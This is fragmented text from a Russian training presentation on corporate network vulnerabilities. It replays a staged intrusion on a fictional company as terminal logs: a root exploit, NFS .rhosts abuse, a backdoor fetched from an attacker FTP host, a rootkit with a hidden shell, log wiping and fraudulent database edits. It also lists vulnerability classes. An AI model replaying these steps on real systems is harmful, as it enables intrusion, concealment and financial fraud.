Презентация на тему Типовая корпоративная сеть, понятие уязвимости и атаки - 3

места
Центральный офис
Филиал
Ресурсы Internet
Пользователи Internet
Внешний нарушитель
Маршру-тизатор
МСЭ
Мобильные сотрудники

Мобильные сотрудники

Atlanta, GA 30338

Domain Name: ACMETRADE.COM

http://www.networksolutions.com/cgi-bin/whois/whois/?STRING=acmetrade.com

fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on (200.0.0.143):
(The 1516 ports

on port 33505
hacker:/export/home/hacker>

SUNW,UltraSPARC-IIi-Engine
hacker:/export/home/hacker>
./cmsd dns.acmetrade.com
using source port 53
rtable_create worked
Exploit successful. Portshell created

hacker:/export/home/hacker>

Trying 208.21.2.67...
Connected to dns.acmetrade.com.
Escape character is '^]'.

#

id

uid=0(root) gid=0(root)

#

uname -a

SunOS dns 5.5.1 Generic_103640-24 sun4m sparc SUNW,SPARCstation-5

#

telnet dns.acmetrade.com 33505

udp 643 mountd
100005 1 tcp

showmount -e www.acmetrade.com

/usr/local server2, server3, server4
/export/home sunspot

rpcinfo -p www1.acmetrade.com | grep mountd

100005 1 udp 643 mountd
100005 1 tcp 647 mountd

showmount -e www1.acmetrade.com

/data1 server2
/a engineering
/b engineering
/c engineering
/export/home (everyone)

export list for www.acmetrade.com:

#

bob
drwxr-xr-x 2 201 1

- protocol: UDP/IP
- transfer size: 8192 bytes

nfs>

nfs>

nfs>

cd bob

uid 201

gid 1

#

nfsshell

nfs>

host www1.acmetrade.com

Open www1.acmetrade.com[208.21.1.12] (mountd) using UDP/IP

nfs>

export

: 1
Remote host : ‘www1.acmetrade.com’
Mount path :

nfs>

!sh

$

echo "+ +" > .rhosts

$

exit

nfs>

nfs>

put .rhosts

cat .rhosts

+ +

nfs>

exit

#

rlogin -l bob www1.acmetrade.com

Last login: Wed Mar 3 10:46:52 from somebox.internal.acmetrade.com

www1%

whoami

bob

www1%

pwd

/export/home/bob

www1%

uname -a

SunOS www1.acmetrade.com 5.5.1 Generic_103640-24 sun4d SUNW,SPARCserver-1000

www1%

cat .rhosts

+ +

bin 13144 Jul 15 1997 /usr/bin/eject*
www1%
gcc

www1%

./eject_overflow

Jumping to address 0xeffff630 B[364] E[400] SO[400]

#

whoami

root

#

ftp evil.hacker.com

Connected to evil.hacker.com.

Name (evil.hacker.com:root):

331 Password required for hacker.

Password:

230 User hacker logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

hacker

eye0wnu

220 evil.hacker.com FTP server (HackerOS) ready.

successful.
150 Binary data connection for out 3.1.33.7,1152).
226 Transfer complete.
152323

ftp>

quit

tar -xf module_backdoor.tar

cd /tmp/my_tools

gunzip module_backdoor.tar.gz

#

#

#

ls, find, du:
#
make
gcc -c backdoor.c
gcc -o installer installer.c
ld –o

#

Makefile
backdoor
backdoor.c
backdoor.o
config.h
configure
installer
installer.c

ls

#

#

modload backdoor

./installer -d /usr/local/share/...

Adding directory...
Fixing last modified time...
Fixing last accessed time...

... backdoor

Enter class C network to hide from netstat:

Enter process names to hide from ps and lsof:

creating config.h...

3.1.33.0

sniffer

backdoor /usr/local/share/.../backdoor
Installing file...
Fixing last modified time...
Fixing last accessed time...
echo

#

cd ..

rm -rf module_backdoor

ls

inetd_backdoor/
logedit
sniffer

./installer sniffer /usr/local/share/.../sniffer

Installing file...
Fixing last modified time...
Fixing last accessed time...

ls /usr/local/share/.../sniffer

/usr/local/share/.../sniffer: No such file or directory

#

cd /usr/local/share/...

#

./sniffer > out &

#

ps -aef | grep sniffer

#

Address Swind Send-Q Rwind Recv-Q State
-------------------- -------------------- -----

#

cd /tmp/my_tools

#

cd inetd_backdoor

#

ls

config.h
configure
inetd.c
installer.c

#

./configure

Enter port for hidden shell:

#

make

gcc -s -DSYSV=4 -D__svr4__ -DSOLARIS -o inetd inetd.c -lnsl -lsocket -lresolv
gcc -o installer installer.c

#

installer inetd /usr/sbin/inetd

Installing file...
Fixing last modified time...
Fixing last accessed time...

creating config.h...
creating Makefile...

31337

–aef | grep inetd
root 179 1

#

#

kill –9 179

#

exit

/usr/sbin/inetd –s &

Connection closed by foreign host.

hacker:/export/home/hacker>

2.5).
Name:
root
331 Password required for root.
Password:
*******
230 User root logged in.
Remote

ftp>

put backdoor.html securelogin.html

200 PORT command successful.

150 Opening BINARY mode data connection for index.html

226 Transfer complete.

ftp>

quit

200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 10
-rwxr-xr-x 9 root other 1024 Aug 17 17:07 .
-rwxr-xr-x 9 root other 1024 Aug 17 17:07 ..
-rwxr-xr-x 2 www www 2034 Aug 17 17:07 index.html
-rwxr-xr-x 2 www www 1244 Aug 17 17:07 securelogin.html
-rwxr-xr-x 2 www www 1024 Aug 17 17:07 image2.gif
-rwxr-x--x 6 www www 877 Aug 17 17:07 title.gif
-rwxr-xr-x 2 www www 1314 Aug 17 17:07 frontpage.jpg
226 Transfer complete. bytes received in 0.82 seconds (0.76 Kbytes/sec)

ftp>

dir

ftp> cd /usr/local/httpd

100000 4 tcp 111 rpcbind

#

rpcinfo -p backoffice.acmetrade.com

4045 nlockmgr
100021 4 udp

#

#

grep ttdbserverd /etc/inetd.conf

100083/1 tli rpc/tcp wait root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd

rpcinfo -p backoffice.acmetrade.com | grep 100083

100083 1 tcp 32773

#

cd /tmp/mytools/warez

-type f -name .rhosts -print
/.rhosts
/export/home/chuck/.rhosts
/export/home/bill/.rhosts
/export/home/larry/.rhosts
#
cat /.rhosts
fideriv.acmetrade root
ibd.acmetrade

#

w

10:20pm up 13:15, 1 user, load average: 0.01, 0.02, 0.03
User tty login@ idle JCPU PCPU what
root console 9:27am 147:52 14:41 14:14 /sbin/sh
root pts/5 9:24pm /sbin/sh

#

#

#

/tmp/mytools/logedit root pts/5

#

w

10:20pm up 13:15, 1 user, load average: 0.01, 0.02, 0.03
User tty login@ idle JCPU PCPU what
root console 9:27am 147:52 14:41 14:14 /sbin/sh

VARCHAR2(15)
ADDR1 NOT NULL VARCHAR2(30)
ZIP NOT NULL NUMBER(5)
PHONE NOT NULL CHAR(12)
ACCOUNT_NUM NOT NULL NUMBER(12)
BALANCE NOT

select LNAME, FNAME, ACCOUNT_NUM, MARGIN_LIMIT from customers where LNAME = 'Gerulski';

LNAME FNAME ACCOUNT_NUM MARGIN_LIMIT
-------------------- ------------- ----------- ------------
Gerulski David 5820981 50000.00
SQL>

update customers set MARGIN_LIMIT = 500000.00 where LNAME = 'Gerulski';

SQL>

select LNAME, MARGIN_LIMIT from customers where LNAME = 'Gerulski';

LNAME MARGIN_LIMIT
------------------- ------------
Gerulski 500000.00
SQL>

exit

которое приводит к реализации угрозы путем использования уязвимостей информационной

Угроза - потенциально возможное событие, явление или процесс, которое воздействуя на компоненты информационной системы может привести к нанесению ущерба.

Уязвимость - любая характеристика или свойство информационной системы, использование которой нарушителем может привести к реализации угрозы.

сетей

системы
Уровень баз данных
Уровень персонала
Уровень приложений

протоколов, служб)
ошибки реализации (программ)
ошибки эксплуатации (неправильная настройка, неиспользуемые сетевые

по уровню (степени) риска
ИНФОРМЗАЩИТА
НАУЧНО-ИНЖЕНЕРНОЕ ПРЕДПРИЯТИЕ
Уязвимости, позволяющие атакующему получить непосредственный

Уязвимости, позволяющие атакующему получить доступ к информации, которая с высокой степенью вероятности позволит в последствии получить доступ к узлу

Уязвимости, позволяющие злоумышленнику осуществлять сбор критичной информации о системе

- координационный центр CERT/CC
www.iss.net/xforce -

llnl.ciac.gov - центр CIAC

www.cert.ru - российский CERT/CC

www.securityfocus.com

ошибки реализации
Описание: посылка большого числа одинаковых фрагментов IP-датаграммы

ошибки реализации
Описание: проблема одной из функций ядра ОС Windows

Примеры уязвимостей

ошибки реализации
Описание: уязвимость в реализации возможности подключения со стороны

Примеры уязвимостей

ошибки реализации
Описание: посылка большого числа некорректно построенных запросов приводит

Примеры уязвимостей

ошибки реализации
Описание: OC Windows 2000 и Windows 98 уязвимы

Примеры уязвимостей

ошибки обслуживания
Описание: узел заражён серверной частью троянского коня, позволяющей

Примеры уязвимостей

уязвимости
Обеспечение совместимости баз данных уязвимостей

(spoofed SYN)


Impossible IP Packet
Bugtrag
CA-97.28.Teardrop_Land
Land
NT4-SP3and 95 [latierra.c]



Уязвимость Land IP denial

RealSecure
Cisco Database
Axent NetRecon

in authenticate command.

Reference: CERT:CA-98.09.imapd
Reference: SUN:00177
Reference: BID:130

Номер

Описание

Ссылки

атаки (отказ в обслуживании)
ИНФОРМЗАЩИТА
НАУЧНО-ИНЖЕНЕРНОЕ ПРЕДПРИЯТИЕ

атаки (отказ в обслуживании)
ИНФОРМЗАЩИТА
НАУЧНО-ИНЖЕНЕРНОЕ ПРЕДПРИЯТИЕ
Получение конфиденциальной информации

атаки (отказ в обслуживании)
ИНФОРМЗАЩИТА
НАУЧНО-ИНЖЕНЕРНОЕ ПРЕДПРИЯТИЕ
Получение конфиденциальной информации
Модификация

атаки (отказ в обслуживании)
ИНФОРМЗАЩИТА
НАУЧНО-ИНЖЕНЕРНОЕ ПРЕДПРИЯТИЕ
Получение конфиденциальной информации
Модификация

Получение полного контроля над
объектом атаки

и объект атаки находятся в одном сегменте
Атакующий и объект

ИНФОРМЗАЩИТА
НАУЧНО-ИНЖЕНЕРНОЕ ПРЕДПРИЯТИЕ

Маршру-тизатор

активность (разведка)
Запуск кода (программы) на объекте атаки
Бесполезное расходование вычислительных

Нарушение навигации (ложный маршрут)

Пассивное прослушивание

ИНФОРМЗАЩИТА
НАУЧНО-ИНЖЕНЕРНОЕ ПРЕДПРИЯТИЕ

Security Systems

3. IIS (Microsoft Internet Information Server)
4. Open Databases
5. E-Business

6. Open Sendmail

7. File Sharing

8. RPC

9. Bind

1. Denial of Service Exploits

kiddie exploits
Poor coding standards
Переполнение буфера в Linux - приложениях

Server)
4. Open Databases
5. E-Business Web Applications
6. Open

7. File Sharing

8. RPC

1. Denial of Service Exploits

10. Linux Buffer Overflows

9. Bind

Top 10

activated buffer-overflow, client request to server, script kiddie
BIND

Server)
4. Open Databases
5. E-Business Web Applications
6. Open

7. File Sharing

1. Denial of Service Exploits

9. Bind

10. Linux Buffer Overflows

8. RPC (Remote Procedure Calls)

Top 10

(linux-mountd-bo)
Major script kiddie fodder
Helped Enabled DDOS

7. File Sharing
2. Weak Accounts
3. IIS (Microsoft Internet

4. Open Databases

5. E-Business Web Applications

6. Open Sendmail

1. Denial of Service Exploits

Top 10

and DSL Users
Sensitive info – I.e., Banking account
Backdoor install
+

Server)
4. Open Databases
5. E-Business Web Applications

7. File Sharing

8. RPC

9. Bind

10. Linux Buffer Overflows

6. Open E-mail (электронная почта)

Top 10

viruses, LOVE
Many localhost getroot exploits for sendmail
Attacks may by-pass

Server)
4. Open Databases
1. Denial of Service Exploits

6. Open E-mail

7. File Sharing

8. RPC

9. Bind

10. Linux Buffer Overflows

5. E-Business Web Applications

Top 10

“path info”
Frontpage Extensions (frontpage-ext) “readable passwords”
FrontpagePwdAdministrators
(frontpage-pwd-administrators) “reveal

Server)
1. Denial of Service Exploits
5. E-Business Web

6. Open E-mail

7. File Sharing

8. RPC

9. Bind

10. Linux Buffer Overflows

4. Open Databases

Top 10

Server Xp_sprintf buffer overflow
SQL Server Xp_cmdshell extended

6. Open E-mail
7. File Sharing
8. RPC
9. Bind
10. Linux

3. IIS (Microsoft Internet Information Server)

2. Weak Accounts

1. Denial of Service Exploits

Top 10

Execution
PWS File Access
CGI Lasso “read arbitrary files”
PHP3

5. E-Business Web Applications
6. Open E-mail
7. File Sharing

8. RPC

9. Bind

10. Linux Buffer Overflows

2. Weak Accounts (слабые пароли)

1. Denial of Service Exploits

Top 10

accounts
SNMP with public/private community strings set

Server)
4. Open Databases
5. E-Business Web Applications
6. Open

7. File Sharing

8. RPC

9. Bind

10. Linux Buffer Overflows

1. Denial of Service Exploits

Top 10

time and target
All are distributed for maximum effect